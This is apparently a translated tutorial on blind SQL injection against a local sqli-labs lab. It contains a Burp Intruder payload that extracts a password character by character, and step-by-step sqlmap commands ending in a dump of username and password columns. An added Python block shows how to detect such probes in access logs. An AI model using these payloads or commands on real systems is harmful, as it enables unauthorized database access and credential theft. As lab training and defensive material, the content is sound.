[Tools] Running blind SQL injection
2022-07-03 04:38:00 【Black zone (rise)】
Contents
1. (Tool) Blind injection with Burp
1.2 Method 2: Brute forcing with an injected statement
2. (Tool) Boolean blind injection with sqlmap
Step 1: Detect whether injection exists
Step 2: Enumerate database names
Step 3: Enumerate table names
1. (Tool) Blind injection with Burp
1.1 Method 1: Brute force
After capturing the request, send it to the "Intruder" module.
Configure 2 payloads.
1.2 Method 2: Brute forcing with an injected statement
Construct the injection statement and iterate over it (the § markers are Intruder's payload positions):
(select case when '§0§' = lower(substring((select password from employees where empid=1),§1§,1)) then 1 else 0 end)
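A defender-side view of the iteration above, as an added example that is not part of the original post: each request differs only in the compared character and the substring offset, so one client sending many one-character substring probes to the same path stands out in access logs. The log format, the /emp path, the client addresses, the thresholds and the function name are assumptions made for this sketch.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# One-character probe: substring(<expression>, <offset>, 1), also substr()/mid().
PROBE = re.compile(r"(?:substring|substr|mid)\s*\(.+,\s*(\d+)\s*,\s*1\s*\)", re.I)

# Constructed sample log ("<client> <request target>"), not taken from the page.
# The query carries the page's statement, URL-encoded, for 2 offsets x 3 characters.
_T = ("/emp?id=(select+case+when+%27{c}%27=lower(substring((select+password"
      "+from+employees+where+empid=1),{p},1))+then+1+else+0+end)")
SAMPLE_LOG = (
    [f"10.0.0.5 {_T.format(c=c, p=p)}" for p in (1, 2) for c in "abc"]
    + ["10.0.0.9 /emp?id=7",                          # ordinary request
       "10.0.0.9 /search?q=substring+of+a+string",    # word only, no call syntax
       "10.0.0.7 /report?expr=substring(name,1,1)"]   # single probe, below threshold
)

def find_blind_extraction(lines, min_requests=4, min_offsets=2):
    """Return {(client, path): stats} for clients iterating one-char probes."""
    seen = defaultdict(lambda: {"requests": 0, "offsets": set()})
    for line in lines:
        client, target = line.split(" ", 1)
        path, _, query = target.partition("?")
        # Decode %xx and '+' first, otherwise encoded payloads slip past the regex.
        match = PROBE.search(unquote_plus(query))
        if match:
            entry = seen[(client, path)]
            entry["requests"] += 1
            entry["offsets"].add(int(match.group(1)))
    # Repeated probes over several offsets indicate character-by-character
    # extraction rather than one stray query.
    return {key: stats for key, stats in seen.items()
            if stats["requests"] >= min_requests
            and len(stats["offsets"]) >= min_offsets}

if __name__ == "__main__":
    for (client, path), stats in find_blind_extraction(SAMPLE_LOG).items():
        print(client, path, stats["requests"], sorted(stats["offsets"]))
```
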
2. (Tool) Boolean blind injection with sqlmap
2.1 Commands:
-u Specify the injection point
--dbs Enumerate database names
--tables Enumerate table names
--columns Enumerate column names
--dump Dump the data
After each item has been enumerated, add in turn -D to specify the database, -T to specify the table and -C to specify the columns.
2.2 Usage:
Step 1: Detect whether injection exists
Example:
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --batch
--batch accepts the default settings without prompting.
The scan has in fact already identified the environment,
so you can add --dbms mysql.
Step 2: Enumerate database names
Command:
# Get all databases
sqlmap.py -u url --dbs --batch
---------
# Get the current database
sqlmap.py -u url --current-db --batch
Example:
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --dbs --batch
Step 3: Enumerate table names
Command:
python sqlmap.py -u url -D DB --tables --batch
Example:
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch
Step 4: Enumerate column names
Command:
sqlmap.py -u url -D DB -T TBL --columns --batch
Example:
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch
Step 5: Dump the data
Command:
sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch
Example:
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch
3. Recommended
[SQL injection - no echo] Boolean blind injection: principles, functions, exploitation process
[SQL injection - with echo] DNS request injection: principles, platform, exploitation process, configuration